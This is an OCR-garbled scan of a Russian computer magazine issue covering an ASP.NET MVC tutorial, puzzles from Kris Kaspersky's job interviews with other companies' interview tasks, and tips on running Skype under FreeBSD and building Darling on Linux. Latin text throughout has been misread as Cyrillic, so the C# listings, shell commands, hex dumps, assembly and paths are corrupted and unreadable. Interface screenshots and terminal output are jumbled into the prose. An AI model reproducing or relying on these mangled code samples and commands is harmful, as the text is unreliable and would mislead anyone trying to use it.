Сотто!ег. Например, если ты хочешь создать контроллер Аатка, то в этом 
случае полное имя должно быть АатткаСотто[ег. 

Чтобы обратиться к созданному контроллеру (из браузера), необходимо 
написать в адресной строке полное имя контроллера и через слеш имя дей- 
ствия. Если требуется передать в контроллер какие-нибудь дополнительные 
параметры (например, методом Се), то их также следует указывать через 
слеш. Такой подход справедлив для маршрута, определенного по умолча- 
нию. Например, для передачи параметра 1 контроллеру Аатшка следует 
пройти по пути: ПЕр://ЛосаПозУИааттка/1. Обрати внимание, что в браузере 
указывать постфикс Сотто|ег не требуется. 


Листинг 6. Код контроллера 
рг1\уаЕе ВиёТгаскегСоп%ехЕ аб = пем ВиёТгаскегСоп*ех* (); 
риб11с АсЕ1опКези1* Тпаех() { 
уаг +1сКее5 = а6.Т1скее$.Тис1иае(р => р.Са%евогу). «= 
Тис1иае(р => р.5афи$).Тпс1иаде(р => р.Цзег); 
гефигп \1ем(+1сКкее$.То|1$%()); 


У тебя может возникнуть резонный вопрос: возможно ли как-то повлиять 
на установленные правила роутинга? Шаблон маршрута определен в клас- 
се ВощеСопяЯод, и ты волен им рулить как хочешь. Например: "“пи{сотщгойек/ 
{асНоп}/{а}" заставит добавлять к имени контроллера префикс ги. 

Хочется еще рассказать про маршруты, но, увы, объем статьи ограничен. 
Пора переходить к рассмотрению небольшого примера кода, демонстриру- 
ющего обработку внешних параметров в контроллере. Думаю, комментарии 
излишни: 


112 тмуРагат1 = Ти*32.Раг$е (Ведие${ .Рагат$ [ "туРагат" ]); 


ДИЗАЙНИМ ПРЕДСТАВЛЕНИЕ 
Контроллер успешно принимает пользовательские запросы, и теперь пора 
сотворить для него представление. Добавить для контроллера новое пред- 
ставление проще всего посредством пункта Ада \Ме\ми контекстного меню, вы- 
зываемого при правом клике по имени действия контроллера. 
В АЗРМЕТ М\УС принято выделять несколько типов представлений: 
. строго типизированные представления (мы должны гарантировать, 
что переданная модель будет заданного типа); 
. частичные представления (используются внутри других представлений); 
. мастер-страницы (представления, позволяющие задать шаблон форми- 
рования страниц). 


Теперь попробуем создать наше первое представление. Поскольку в на- 
шем приложении будет несколько повторяющихся элементов (например, 
общая разметка, сайдбар и так далее), мы можем пихать этот код в каждую 
вьюшку, но выгодней создать одну мастер-страницу, которая впоследствии 
будет использоваться при формировании других представлений. 

Мастер-страницы принято помещатьвдиректорию ЗПагеч. Длясвоегопри- 
мера я определил одно представление и назвал его _БидТгаскегМаегРаде. 
сэт! (содержит основную часть верстки). Приводить код вьюшки я не буду 
из-за ее объема, а лучше сразу рассмотрю используемые управляющие кон- 
струкции: 

. Нит.Рага/(" е{5аербаг") — вызов частичного представления с именем 
" еНю«егра!". В одноименном файле я описал код верстки левого сайд- 
бара; 

. ВепаегВоау() — запускает рендеринг других представлений, созданных 
на основе данной мастер-страницы; 


| Риебох ^ | |— [2] №39 
|@вуо Тгаскег Рог ][ - Пол... | + | 
1юсао$59534 с @- сооде р а в- 


№ Список тикетов 


ата Пользователь Категория Заголовок Статус 
№ Открытые тикеты д Р ы 
01/января/13 190г АПЮпо\ Железо В принтере НР Р1006 Открыто 


1 Закрытые тикеты 
0:00:00 кончился картридж 


02/января/13 190г АпЮпоУ\ Поддержка В программе не формируется Открыто 
0:00:00 ПО отчетность в ПФР 


$ Профиль (А!се Соорег) 
@ Выйти 
01/января/13 9ог Апюпоу Поддержка — При открытии возникает Открыто 
0:00:00 по ошибка 


> НИ 


Списоктикетов изБД 
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СВУО 


Имя контроллера: 


СгиаСоттойег 


Параметры формирования шаблонов 


Шаблон: 


М\УС-контроллер с действиями чтения и записи и представлениями, использующий ЕпШу Егатемок У 


Класс модели: 


Иске{ (ВидТгаскегРогХ.Моае!5) у 

Класс контекста данных: 

ВадТгаскегСомех{ (ВидТгаскегРогХ.Моде!5) = 

Представления: 

Вагог (С$НТМИ) ыы | | Дополнительные | 
Добавить | | Отмена 


. Пй.Сотепк“”/поте/сгемеЕщгу") — хелпер формирует абсолютный путь к приложению; 
. осир$.Вепаег(“а$$е5/5/ачегу.|5") — хелпер генерирует теги <$спр{></5зсри> и про- 
писывает в атрибут $гс путь сценарию. 


Когда разберешься с используемыми управляющими конструкциями, становится ясно, 
что весь код представлений, созданный на основе мастер-страницы, будет включен на ме- 
сто вызова НепаегВочду(). 

Чтобы остальные представления знали, на основе какой мастер-страницы им ренде- 
риться, мы должны указать на нее ссылку: 


@{ 
| 


ЕауочЕ = "-^/\/1ем$ /5Пагеа/ _БиёТгаскегМа${егРаде. с$Ит1"; 


Во время разбора кода мастер-страницы ты наверняка обратил внимание на символ 
«собачка», расположенный возле каждой управляющей конструкции. Все, что идет после 
этого символа, воспринимается как код на языке С#. Если требуется выполнить несколько 
строк управляемого кода, то для этого надо воспользоваться открывающими и закрываю- 
щими скобками. 

Теперь посмотрим на код представления шпаех. В вьюшке формируется список имею- 
щихся в базе тикетов. Выборка самих данных происходит в контроллере, и список с ними 
передается в представление: 


ВиёТгаскегСопфехЕ @6 = ВиёТгаскегСоп*ех* (); 
маг +1сКее5 = а6.Т1скее$ .Тис1иае(р => р.Са%Жегогу).Тис1иае(р => «= 
р.5Жафи$).Тис1иае(р => р.Узег); 

\М1ем(Е1сКеф$.ТоЕ1$()); 


Запрос к таблицам БД выполняется не напрямую, а через ЕпМу Егатемогк. Поскольку 
модель Писк&{ содержит ссылки на другие модели, то мы должны включить их в запрос (ме- 
тод псиае()). Сформированная выборка передается в качестве параметра соответствую- 
щему представлению. 

Вывод данных из модели в самом представлении осуществляется в стандартном цикле: 


@Рогеасй (маг с 1п Моде] ) 


Здесь я перебираю записи из Моае|, которую предварительно объявили в самом начале 
файла представления: 


@тоае1 ТЕпитегаб1е<ВиёТгаскегЕогх.Мо4де1$ .Т1сКеф>. 


На этом код первого таех() можно считать разобранным, самое время осуществить тесто- 
вый запуск проекта и посмотреть результат. 

Полный список тикетов выводится, и теперь остается лишь дописать код добавления 
новых записей — это будет твоим домашним заданием. 


О1ЗРОЗЕ 

Разрабатывать веб-приложения под платформу АЗРМЕТ благодаря фреймворку АЗР.МЕТ 
стало значительно проще. Рассмотренный в статье пример — лишнее тому подтверждение. 
Я не хочу сказать, что АЗР. МЕТ — это золотой костыль или серебряная пуля веб-строителя. 
Это очередная технология, которую нужно уметь применять. Мир на РНР пусть даже с его 
многообразием самых разных фреймворков, однозначно не заканчивается. Не стесняйся 
пробовать альтернативные технологии, не засиживайся в одной, пусть даже самой ком- 
фортной среде. Сравнивай технологии и выбирай из них наиболее оптимальную для кон- 
кретной задачи. 

На этом у меня все. = 


Га Ч м 
Добавление контроллера ре Мастер настройки 


ТОП-5 


М.И. Ф.0О.В 
ОБ АЗР.МЕТ / АЗРМЕТ М\С 


«А под ИМХ-ИКе это 

не заведется!» 

Еще как заведется. Достаточно 
немного почитать о проекте Мопо 
(а00.9/953м), а потом статью 
«Установка АЗР. МЕТ на Мпих 
(пашх + топо + ХЗР)» (900.9 
гРУОХ), и миф сразу развеется. 


«Это же жутко дорого, надо много 
$$$». 

Опять неправда. Можно восполь- 
зоваться ехрге$$-версией \Мзиа! 
Зиаю ТогМеВ (именно ее я ис- 
пользовал при написании статьи) 
или какой-нибудь альтернативной 
средой (все верно, здесь сплош- 
ная демократия). Остальные ком- 
поненты (например, ЗО Зегуег) 
также доступны в бесплатных 
вариантах. Кроме того, М!сго5ой 
регулярно проводит всяческие 
акции/скидки, позволяющие по- 
лучить полноценные версии про- 
дуктов либо совсем бесплатно, 
либо с существенной скидкой. 


«М!сго5оН делает дырявый софт». 
Ну да, и это не мешает им 
богатеть и завоевывать новые 
рынки. Если серьезно, про- 
дукты Мсго$ой в большинстве 
случаев намного безопаснее, 
чем опенсорсные альтернативы. 
Проверить это нетрудно. За- 
ходим на багтрекер и смотрим 
количество ошибок под $ (как 
пример) и под Араспе. Результа- 
ты приятно удивят. 


«РНР-приложения работают 
быстрее». 

Точно, работают. Не забывай, 

что код под АЗР.МЕТ будет снача- 
ла компилироваться, а только по- 
том исполняться. Причем именно 
выполняться, а не стремиться 
умереть, как аналогичный на РНР. 
Поэтому РНР если немного 

и побеждает, то только на фаль- 
старте. Производительность АЗР. 
МЕТ хорошо показывает себя 

на больших проектах. 


«На РНР программировать 
проще». 

Порог вхождения действи- 
тельно ниже, но не настолько, 
как об этом твердят на каждом 
шагу. Время, вложенное в из- 
учение полностью объектно- 
ориентированного С#, окупится 
на первом же более сложном 
проекте. 


774 Кодинг 


У 


Александр Лозовский 
[070УЗКу@а[С.Ги 


Крис Касперски 
роапи'@дтай.сот 


ЗАДАЧИ НА 
СОБЕСЕДОВАНИЯХ, 


ХАКЕР 10 /177/ 2013 


Сегодня у нас небольшой праздник: Крис Касперски, постоянный автор |[ на протяжении 
почти десяти лет, вернулся на наши страницы. Соскучился он по нам в этом своем асашае! 


Передадим ему слово. 


Г Г После ухода из МсА!Тее, в которой я провел три счастливых года, начался неспешный поиск новой работы 
на позицию эксперта по безопасности. За время собеседований я встретил много умных людей, узнал свои 


слабые места и повидал практически все США. Наиболее интересные задачки приводятся ниже. На собесело- 
ваниях разрешается использовать свой собственный ноутбук и интернет (при наличии За-модема в кармане). 9 9 


НОВАЯ ПАРТИЯ ЗАДАЧ: КАК СОБЕСЕДОВАЛИ КРИСА КАСПЕРСКИ В США 


ПЕРВАЯ ЗАДАЧА 

Дается двоичный файл и предлагается ответить 
на вопрос, как неофициально называется место, 
в котором при успешном прохождении собеседо- 
вания предстоит работать. В Пех-виде содержи- 
мое файла выглядит так: 


78 9С @В 4Е СО 49 СЕ СЕ 40 55 28 С9 «+. 
57 28 С9 48 
55 ЕО С8 2С 4В 55 54 54 Е4 ЕЪ 02 9090 «+ 
69 АВ 0907 57 


Текст английский, кодировка ОТЕ8. Если воз- 
никнет желание решить задачу методом перебо- 
ра, то вот наиболее полные словари английского 
языка в рат-{ех{ формате: 6(./у/а8 ОМУ. 


ВТОРАЯ ЗАДАЧА 

Игорь Русских (автор популярного ГЕАВ-плагина 
Соогег) в своей дипломной работе приводит 
фрагмент Со!огега, обеспечивающий раскраску 
вложенных комментариев (6 \.1у/1ас3Р95): 


<°спете пате="сМе${едСоттеп* -1п%егпа1"> 
<1пИег1Е зспете=" Соттеп*" /> 
<Б1оск зспете=" сМезедСоттеп* -+= 
1пегпа1" геё1оп="Соттепт*" > 
<5фагЕ геё1оп="Ра1г"5агЕ" > 
/^/\*/</5агф> 
<епа геё1оп="Ра1гЕпа" >= 
АУУ ейа» 
</Б1оск> 
</зспете> 


<<сНете пате="сМезедаСоттепт*" > 
<Б1оскК зспете=" смМе$ЕеаСоттеп* -+= 


1пфегпа1" геё1оп="Соттепт*" > 
<5фагЕ геё1оп="Ра1"5аг{" >+- 
уе ЕагЕ» 
<епа геё1оп="Ра1гЕпа" >= 
/\*\//</епа> 
</61оск> 
</зспете> 


Написать программу на АМЗ! С для тестиро- 
вания Соогега. В качестве бонуса предлагается 
найти и исправить ошибку. 


ТРЕТЬЯ ЗАДАЧА 
Если открыть РОЕ-файл в Пех или текстовом ре- 
дакторе, то можно увидеть, что за магическим 
словом «%РЬОЕ-{версия}» следует некоторое ко- 
личество мусора (как правило, четыре символа), 
отмеченных символом комментария %, а потому 
(согласно спецификации) игнорируемых про- 
граммами, работающими с РОЕ 

Вопрос: откуда берется этот мусор и какую 
роль выполняет? Бонус (также являющийся под- 
сказкой): убрать мусор и описать сценарий (ре- 
альный или воображаемый), приводящий к пор- 
че РОЕ-файла при его передаче между узлами 
связи. 


%РОЕ-1.4 
%АИМТ 

10 05] 
РОЕ-1.5 
ччччЧ 

10 05] 
%РОЕ-1.6 
%вгПУ 

10 05] 


ЧЕТВЕРТАЯ ЗАДАЧА 

Написать системно-независимый «скелет» анти- 
вируса, сканирующего файлы по заданному пути 
и вызывающего внешнюю процедуру спеск_ 
(Ро! ра), которая принимает в качестве аргу- 
мента полный путь к файлу. Условимся считать, 
что функция возвращает строку, которую требует- 
ся вывести на экран. Исключения не выбрасыва- 
ются, и при возникновении возвращается строка 
с соответствующим описанием. 

Для реализации «обертки» вокруг функции 
спеск_И допускается использовать любые обще- 
употребительные языки (Си, Си+-, питон, руби, 
джава, афины) со всеми библиотеками, пред- 
установленными по умолчанию. 

«Скелет» должен корректно обрабатывать 
ситуацию, возникающую в результате выполне- 
ния такой последовательности команд на Шпих- 
подобных системах: 


са /поте/ 

тКа1г хаКер_\е$* 
с хаКер_Те$т/ 
тка1г Фоо 

са Фоо 

шкатг Баг 

са Баг 
Л" -5. 


./../ Бах 


ПЯТАЯ ЗАДАЧА 

Заказчик поручил Подрядчику разработать клон 
игры \\/агСгай, но в полноценном ЗО, где дей- 
ствие разворачивается на планете Железяка, 
представляющей собой идеальную сферу ради- 
уса В и лишенной каких бы то ни было неровно- 
стей рельефа. 
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Подрядчик поручил Субподрядчику написать 
модуль, тестирующий передвижение юнитов. 
Субподрядчик решил действовать так: в случай- 
ном месте с координатами Х, У высаживается 
юнит, который перемещается на М шагов на юг, 
затем М шагов на запад, далее делает М шагов 
на север, после чего разворачивается на восток 
и через М шагов оказывается в исходном месте 
с координатами Х, \. В этом случае тест считается 
пройденным и, соответственно, наоборот. Тест 
выполняется очень большое (практически бес- 
конечное) число раз. Генератор случайных чисел 
доброкачественный. Имеет ли программа шансы 
на прохождение теста? Ответ обосновать. 

Бонус (он же подсказка): найти отклонение 
от спецификации при условии стабильного про- 
хождения данного теста. 


Поехали программисты на рыбалку. Чтобы да- 
леко не ехать, ловить рыбу решили в бассейне 
у дома. Сели в лодку, забросили удочки, открыли 


пиво и стали ждать. Не клюет. А между тем выпи- 
тое пиво уже просится наружу. (Женщин убрать!) 
Недолго думая, программисты высунули шланги 
и совершили дренаж пива за борт. 

Вопрос: как изменился уровень воды в бас- 
сейне после этой операции? Испарением пре- 
небречь. В бассейн ничего не втекает, и ничего 
из него не вытекает. Точность измерения уровня 
воды бесконечно высокая. 

Хинтили таже самая задача, адаптирован- 
ная для женщин: рыбак сидит в лодке и держит 
в руках кирпич. Бросает кирпич за борт. Что про- 
исходит с уровнем воды? 


Используя @ооде (или другую поисковую систе- 
му), ответить на вопрос, что делает приведенный 
ниже код. При отсутствии интернета предложить 
стратегию поиска. 

Хинт: соискатель претендует на позицию, 
предполагающую немедленный ответ на вопрос 
«что оно делает», поскольку очень часто встреча- 
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ет заданный код. Требуется продемонстрировать 
навыки работы с поисковыми системами, наце- 
ленными на естественные языки и плохо справля- 
ющимися с машинными кодами. 


0000068А: 8В6С2418 тому ебр, [езр] [918] 
0000068Е: 88В453С  то\у еах, [ ебр] [93С] 
00000691: 88540578 то\у еах, [ебр | [еах ] = 
[978] 
00000695: 0305 ааЧ еах,ебр 
00000697: 88В4А18 — то\ есх, [еах] [918] 


0000069А: 8В5А20 — то\ еБх, [е@ах] [020] _ 
00000690: 9300 ааа ебх,ебр 


Программист написал функцию для деления од- 
ного ВаМит на другой ВаМит, и она успешно ра- 
ботала до тех пор, пока не попытались разделить 
ноль на ноль, получив ноль в качестве результата. 
Вопрос: как такое могло произойти и почему? 
Бонус: написать псевдокод функции деления, 
соответствующей такому поведению. 


РЕШЕНИЕ ЗАДАЧ ОТ ЕМВАВСАОЕВО 


Дан массив, содержащий ссылки на объекты 
типа «кнопка». Каждая кнопка имеет координаты 
верхнего правого угла (ей, Тор), а также ширину 
и высоту (Ла, Нед. Разработать функцию, 
задающую размещение кнопок на форме. Кноп- 
ки должны располагаться вплотную друг к другу 
и не выходить за размер формы. Учесть вариант, 
когда все кнопки не умещаются в один ряд. 

Ответ: если все кнопки имеют одинаковые 
ширину и высоту, то решение достаточно три- 
виально. Если каждая кнопка имеет свою уни- 
кальную высоту или ширину, то рассчитать ко- 
личество кнопок в ряду заранее нельзя. Сначала 
итеративно, добавляя очередную кнопку к теку- 
щему ряду, вычисляем суммарную длину кнопок. 
Одновременно выявляем кнопку с максимальной 
высотой. Продолжаем, пока суммарная шири- 
на кнопок меньше ширины формы. После этого, 
зная высоту ряда, равную максимальной высоте 
кнопок, и количество кнопок в ряду, приступаем 
к позиционированию кнопок на форме. Перехо- 
дим кследующему ряду. Выполняем размещение 
кнопок по рядам до тех пор, пока в массиве оста- 
лись нераспределенные кнопки. 


|-КОМПАНИИ, ШЛИТЕ 
НАМ СВОИ ЗАДАЧКИ! 


Миссия этой мини-рубрики — образовательная, 
поэтому мы бесплатно публикуем качественные 
задачки, которые различные компании предлага- 
ют соискателям. Вы шлете задачки на 107о\$Ку@® 
Ос.ги — мы их публикуем. Никаких актов, до- 
говоров, экспертиз и отчетностей. Читателям — 
задачки, решателям — подарки, вам — респект 
от нашей многосоттысячной аудитории, пиарщи- 
кам — строчки отчетности по публикациям в топо- 
вом компьютерном журнале. 


Заданы три точки координатами Х1, У1, х2, уг, хз, 
уз. Определить, попадает ли точка с координата- 
михи ув треугольник, образованный исходными 
точками. Если решение задачи заняло меныше 10 
минут (вместе с реализацией в коде), то распро- 
странить решение на трехмерный случай и про- 
странственное задание точек. 

Ответ: для решения данной задачи нужно 
ориентироваться в базовых алгоритмах ком- 
пьютерной графики, а также знать геометрию. 
Для успешного прохождения собеседования 
достаточно назвать «метод трассировки лучей» 
как общий случай решения задачи о принадлеж- 
ности точки многоугольнику. По координатам 
вершин вычисляются коэффициенты в уравнении 
прямой для каждой стороны. Затем из точки (х, 
у) «пускается» луч в произвольном направлении. 
Если количество пересечений луча со стороной 
нечетно (в общем случае) или равно единице 
для треугольника, то точка находится внутри него. 

Для пространственного случая нужно знать, 
как из трех точек получить уравнение плоско- 
сти в пространстве. Далее, в предположении, 
что нормали пирамидки, состоящей из треуголь- 
ников, согласованы, то есть направлены «наружу», 


ЧИТАТЕЛИ, ШЛИТЕ НАМ ВАШИ РЕШЕНИЯ! 


Правильные ответы присылай или мне, или на адрес представителя 
компании, который может быть указан в статье. Поэтому тебе придет- 
ся не только решить задачку, но и дочитать статью до конца. Не шут- 


ка — две страницы чистого текста! 


СЛАВИМ РЕШАТЕЛЯ! 


Сергей Мельников (ОАО «Туполев», Москва) правильно решил все за- 
дачки от Етрбагсаадего. За это он получает приз — лицензию на АРАБ 


Зиаю ХЕ4 Агспкес+. Респект ему! 


рассчитываем расстояние от точки до каждой 
из плоскостей. Если это расстояние для каждой 
грани имеет один и тот же знак, то точка находит- 
ся внутри. 


Даны два отряда боевых юнитов. Первый состоит 
из существ А, каждое из которых обладает защи- 
той 41, здоровьем П1 и атакой а1. Для существ Б 
параметры задаются значениями а2, П2 иа2. Из- 
вестно, что при боевом взаимодействии между 
отрядами здоровье существ уменышается обрат- 
но пропорционально защите. Создать программу 
расчета исхода боя при условии, что существа 
А атакуют первыми существ Б, причем все атаку- 
ют всех. 

Ответ: расчет нужно вести итеративно, то есть 
в цикле, пока количество существ в каждом от- 
ряде больше нуля. На каждой итерации нужно 
вычислить текущее количество юнитов в каждом 
отряде: п2 := п2 - (а1*п1)/(12*а2) и п1 := п1 - 
— (а2*п2)/(п1*а1). В формулы может потребо- 
ваться ввести дополнительные коэффициенты, 
чтобы при приблизительно равных сторонах бой 
продолжался достаточно долго, если речь идет 
о визуализации картины боя. == 


РЕШЕНИЕ 
ЗАДАЧ ОТ КОДА 
БЕЗОПАСНОСТИ 
И КОМПАНИИ 
СУТ 


Жди его в следу- 
ющем номере. 

А твои, да, вот 
твои решения, 
где они? :) 


Отихога 


,. 


Восполняем 
пробелы 


в *шх-системах 


Э НЕДОСТАЮ 
ЭЛЕМЕНТ 


Существует великое множество различных *тх-систем 

и дистрибутивов Мпих/ВЗО. Бывает, что той или иной 
функции или программы, к которой ты привык в твоей 
любимой системе, вдруг по каким-то причинам нет в другой. 
Есть ли аналоги или способ заставить ее заработать? 


ЗАПУСК $КУРЕ ПОД ЕВЕЕВ$О 
Известно, что версия Куре из апортов, мягко 
говоря, устарела — к примеру, нет возможности 
совершать видеозвонки. Использовать \МАпао\м$- 
версию через \ммпе не вариант — под вайном 
он не запускается. Но выход есть — установить 
слой совместимости с ИШпих, затем, после нало- 
жения патча на ядро и последующей его переком- 
пиляции, уже ставить $Куре. Опишем, как именно 
это сделать. 

Первым делом необходимо собрать порт 
ети] афог$/11пих-Базе-сб — при этом, если не- 
обходим Назй-плагин, нужно произвести некото- 
рые действия, а именно в такеНе данного порта 
закомментировать следующую строчку: 


СОМЕЕТСТ$=11пих_Базе-вепфоо* += 
11пих_Базе-+* 11пих-51162-* 


Затем набрать команды: 


# зузсЕТ сотраф. 11пих.озге1еазе=2.6.18 


Роман Ярыженко 
готтапю@уапдех.ги 
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У 


# таке раесП 


Первая установит версию ядра в 2.6.18 (за- 
тем нужно будет прописать эту переменную 
в /Боо*/1оаадег.соп+, чтобы после перезагрузки 
она не сбрасывалась), а вторая применяет патч, 
который мы только что сделали. После этого ско- 
пируем следующие библиотеки из каталога могКк 
в /сотра*/11пих/: 


116/1а-2.12.$0 


116/1а-11пих.$0.2 


116/116с-2.12.50 


1107 1 5Е; 50.6 


116/116а1-2.12.50 


1167/1169] .50.2 
116/116#сс_$5-4.4.6-20110824.50.1 
116/11 1Бесс 5.50.1 
116/116#116-2.0.50.0 


116/1165116-2.0.50.0.2200.5 


116/116рЕИгеад-2.12.$50 


116/116рЕпгеаа. 50.0 


и5г/116/1165$Е4с++.$50.6 


и$г/116/116${4с++.$0.6.0.13 


Создадим симлинк с ич$г/116/11641++.50.3 
на 11611+1+.50.4: 


# и -$ 115%1Е+.50.3 115%1+.$0.4 


Все эти действия необходимы, только если 
тебе нужен порт имм/ 11пих-+10-ЯазИр1ив1п. 

Следующим этапом будет замена заголовоч- 
ного файла для поддержки видеовызовов (необ- 
ходимо, если версия ЕгееВ$О ниже девятки): 


# са /чзг/рогЕ$/ти11тейдта/«= 


11пих_\412игаррег-Ктоа 


# таке рафсП 
# ту -1 /5у$/сотра* /11пих/ == 


11пих_\1аео4еу2.И{,.БаКк} 


# ср -1 могК/11пих_\412/+«- 


11пих_\1Аео4еу2.И /зу$/сотра*/11пих 
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Звомок Бо / бомпхЯ Тез Зегуке 


Еспо / 5оипЯ Тез4 5емлсе 
] 


я Звонить на телефоны и отправлять $М$ | 


зе Пользователей в сети: 64,390.360. 


Недостающий элемент 


А 


Сотр111п8 
Сотр111п# 
Сотр111п8 
Сотр111п# 
Сотр111п# 
Сотр111п# 
Сотр111п8 
Сотр111п# 
Сотр111п8 
Сотр111п8 
Сотр111п8 
Сотр111п8 
Сотр111п8 
Сотр111п# 
Сотр111п8 
Сотр111п8 
Сотр111п8 
Сотр111п8 
Сотр111п# 
Сотр111п# 
Сотр111п8 
Сотр111п8 
Сотр111п# 


Файл Правка Вид Терминал Переход Справка 


+{11е 
+11е 
+11е 
111 е 
111е 
+11]е 
+1]е 
+11е 
+11е 
+11е 
+11]е 
111е 
+11]е 
111е 
111]е 
111е 
111е 
+11е 
+11е 
+11е 
+11е 
+11е 
11]е 
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Терминал - гот@гот-дезКкор: -/впиз{ер-Базе - +) 


СГ Е 

65\Уа1ие.т ... 
М№АТР1пеТгапФогт.м ... 
№Агсп1уег.м ... 
№Аггау.т ... 
№Аз5ег{1опНап1ег.тм ... 
№5АфЕГг1Битед${г1пр.т ... 
№Аитоге]1еазеРоо1.т ... 
№вВипа]1е.т ... 

№Сасве.т ... 
№5СаспедувЕВезроп$е.т ... 
№Са1епдаг.тм ... 
№Са1епдаграте.т ... 
№5Са11]ВаскК$.т ... 
№5СПагастег$е{.т ... 
№5С1а$$Безсг1рЕ1оп.м ... 
№Содег.т ... 
№Сору0Б]ес{.т ... 

№ Соиптед$е{т.т ... 
№СопсгефенаНТа1е.т ... 
№СопсгетеМмарТаЬ1е.м ... 
№Соппес{1оп.т ... 
№Бата.т ... 


Зкуре, запущенный под ЕгеевВ $0 Сборка @МУ$Зер-Базе для Вай тд 


и пересобираем ядро. Это нужно для того, чтобы 
вызовы ЮСй Мпих нормально транслировались 
в вызовы ЁЕгеевВ$О. 

Также придется поставить порт ти11тей1та/ 
мебсата: 


# са /чзг/рог$/ти1Е1тед1а/ме6сата 
# таке 1п${фа11 с1еап 


И теперь наконец можно ставить ЗКуре — 
но не абы какую версию, а конкретную. Берем от- 
сюда: аоо.а/Оа@Шь, распаковываем в свой до- 
машний каталог и, если все настроено правильно, 
наслаждаемся. 


ЗАПУСК ПРИЛОЖЕНИЙ 0$ ХВ ИМИХ 

Под ОЗ Х есть немало интересных приложений. 
Однако формат исполняемых файлов Масп-0, 
используемый в ОС от Арре, отличается от ЕЁЕ, 
да и АР!, хоть и РОЗХ-совместимый, все же 
с Чпих несовместим. В конце 2012 года был пред- 
ставлен проект Вайтд, который позиционируется 
разработчиками пока как средство для запуска 
инструментов разработки. Сейчас поддержива- 
ется совсем немного приложений (по большей 
части консольных), но хочется надеяться, что их 


количество будет неуклонно расти. Проект, вчаст- 
ности, использует @МУЗ1ер — свободную реали- 
зацию АР! Сосоа, которая применяется в ОЗ Х. 
Сборка Пайтда потребует установки множе- 
ства пакетов, в том числе компилятора С!апд: 


$ зи4ао ар*-веф 1п5%а11 214 стаКке <= 
116)]реё-аеу 116рпё-аеу 115Е1++-аеу «= 
116654-аеу 11Биаеу-аеу 1161ст$-аеу «= 
116Качеие-деу 1165$$5$1-аему 116672-ае\у ‹! 
с]1ап> пазм 2++ спеск1п$%а11 «= 
116хт12-де\у 1165пи{1$-ае\у 1161си-аем ‹„ 
116са1го-4еу ии1а-деу 116псиг$е$-дем ‹- 
116 хгапаг-де\ 


Получаем из — СЁ-репозитория 
СМУ ер Маке, компилируем и ставим: 


утилиту 


$ =1Е с1опе Ире: / /в1еПиЬ. сот/впи$ер/-= 
впи5фер-таКе. 211 

$ са впиз{ер-таке 

$ СС=с1апв СХХ=с1апв++ ./сопЯявиге 

$ зидо маке 1п5%а11 


Собираем библиотеку поддержки ОШЩесуе-С — 
СМУер Ибос2: 


1 с1опе ПЁЁрз: 1ЕВиЬ . сот/впи$ер/«= 
впи5фер-11606}]с2. 51% 

$ са впи5ер-11606}с2 

$ ОВЭСЕЕА@$=-Е61оск$ СС=СсТап8 «= 
СХХ=с1апё++ стаке . 

$ гт СМУтакеЯя1е 

$ таке 


$ зсиао таКе 1п$%а11 


Затем базовую часть @МУЗер: 


$ 21 Е с1опе Ире: / /е1ЕПиЬ . сот/впи$ер/-= 
впи5{ер-Базе. 21+ 

$ са вптизер-Базе 

$ ОВЭСЕЕА@5=-Е61оск$ СС=с1апе «= 
СХХ=с1ап8++ ./сопйвиге 

$ маке 

$ зидо маКе 1п5%а11 


И его @Ш: 


$ =1Е с1опе Ире: / /в1ЕПиЬ . сот/впи$ер/-<= 
впи$ер-5и1.51% 

$ са впизер-ви1 

$ ОВЭСЕЕАб$=-Е61оск$ СС=СсТап8 «= 


СХХ=с1ап8++ ./сопйвиге 


гоо{@гот-дезКтор:-—/аЙеп гот@гот-4езКфор:-— 


Файл Правка Вид Поиск Терминал Справка 

[гот@гот-Че$КТор -]$ а\1еп -г 2751 4.3.17-1 1386. деь 

Магп1п9: а\1еп 15 пот гипп1пд а$ гоот! 

Магп1п9: Омпег$В1р$ оф ТЩез 1п {Пе депегафед расКадез м111 ргобаб\у Бе мгопд. 
Магп1п9: $К1рр1пд сопуег$1оп оф $сг1рф5 1п расКаде 75П: ро511п5{ ро$фгт ргегт 
Магп1п9: Ц5е Т1Ве --5сг1рт$ рагатефег То 1пс\иде {Ве $сг1р{$. 
751-4.3.17-2.1386.грт депегатед 

[гот@гот-де$Кфор -]$ [] 


ы Файл Правка Вид Поиск Терминал Справка 


рег1 -1 -ре "5/\@уег$1оп\@/8.88/9" <а\1еп.5рес.1п >аеп. 5рес 

Мап1Ту1пд 6116/тап1/а11еп.1 

рег1 -1 -ре "$/\@уег$1оп\@/8.88/9" <а1\1еп.15т.1п >аеп.15т 

рег1 -1 -ре "5/\@уег$1оп\@/8.88/49" <а\1еп.5рес.1п >аеп. 5рес 
/и5г/Тоса1 /5Паге/рег15/А11еп/РасКаде . рт 
/и5г/1оса1 /5Паге/рег15/А11еп/РасКаде/РКд .рт 
/у5г/1оса1 /5Паге/рег15/А11еп/РасКаде/Врт.рт 
/у5г/1оса1/$Паге/рег15/А11еп/РасКаде/1$Ь .рт 
/у5г/Тоса1 /5Паге/рег15/А11еп/РасКаде/0еБ .рт 
/ич5г/1оса1/5Паге/рег15/А11еп/РасКаде/Тд? .рт 
/у5г/Тоса1 /5Паге/рег15/А11еп/РасКаде/5 Тр .рт 
/и5г/Тоса1 /5Паге/тап/тап1/а11еп.1 
/ч5г/1оса1/5Паге/тап/тапЗ/А11еп: :РасКаде: :РКд 
/и5г/Тоса1 /5Паге/тап/тапз/А\1еп: :РасКаде: :О0еБ. 
/и5г/1оса1/5Паге/тап/тапз/А\1еп: :РасКаде: :Врт. 
/и5г/Тоса1 /5ПВаге/тап/тапз/А\1еп: :РасКаде: :51р. 
/у5г/Тоса1 /5Паге/тап/тапЗ/А\1еп: :РасКаде: :1$6 
/ч5г/1оса\1/5Паге/тап/тапз/А11еп: :РасКаде .Зрт 
/у5г/Тоса1 /5ПВаге/тап/тапз/А\1еп: :РасКаде: :Тдт. 
/ч5г/1оса1/61п/а\1еп 
/ч5г/1оса\/5Паге/а\1еп/ратспе$ \ 

/маг/116/а11еп 
Арреп91пд 1п5таДа{1оп 1пТо То /и$г/116/рег15/регЛоса1 .ро9 
[гоо{@гот-дезКфор а\1еп]# 1 


Компиляция и установка айеп Конвертация пакета ае6 в АРМ 


17$ Отхога 


У Терминал - гот@гот-де5Ктор: - 


Файл Правка Вид Терминал Переход Справка 


ь д 
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Терминал - гот@гот-дезКтор: - 


Файл Правка Вид Терминал Переход Справка 


